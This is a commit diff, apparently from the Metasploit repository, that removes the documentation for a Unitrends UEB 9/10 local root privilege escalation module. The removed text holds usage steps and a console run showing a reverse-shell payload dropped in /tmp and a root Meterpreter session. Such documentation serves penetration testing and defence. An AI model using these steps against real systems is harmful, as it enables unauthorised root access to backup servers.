ueb privesc updates

2018-11-27 21:14:05 -05:00 · 2018-11-27 21:14:05 -05:00 · 4af5ab3089
parent 4d65174f6d
commit 4af5ab3089
2 changed files with 0 additions and 38 deletions
--- a/documentation/modules/exploit/linux/local/ueb_priv_esc.md
+++ b/documentation/modules/exploit/linux/local/ueb_priv_esc.md
@ -1,38 +0,0 @@
-## Vulnerable Application
-
-  Unitrends UEB 9/10 local privesc
-
-  This exploit leverages bpserverd proprietary protocol to issue commands
-  as root.
-
-## Verification Steps
-
-  1. Get a shell with exploit/linux/http/ueb10_api_systems
-  2. ```use exploit/linux/local/ueb_priv_esc ```
-  3. ```set session [SESSION]```
-  4. ```exploit```
-  5. A highpriv meterpreter session should have been opened successfully
-
-## Scenarios
-
-### UEB 10.0 on CentOS 6.5
-
-```
-msf > use exploit/linux/local/ueb_priv_esc
-msf exploit(linux/local/ueb_priv_esc) > set session 4
-session => 4
-msf exploit(linux/local/ueb_priv_esc) > exploit
-
-[*] Started reverse TCP handler on 15.0.0.177:4444
-[*] Writing payload executable to '/tmp/pEFoythF'
-[*] Writing privesc script to '/tmp/CTZSovJR'
-[*] Fixing permissions
-[*] Sending stage (857352 bytes) to 10.20.1.202
-[*] Meterpreter session 5 opened (15.0.0.177:4444 -> 10.20.1.202:45188) at 2018-04-27 16:44:28 -0400
-[+] Deleted /tmp/pEFoythF
-[+] Deleted /tmp/CTZSovJR
-
-meterpreter > getuid
-Server username: uid=0, gid=0, euid=0, egid=0
-
-```
--- a/modules/exploits/linux/local/ueb_bpserverd_privesc.rb
+++ b/modules/exploits/linux/local/ueb_bpserverd_privesc.rb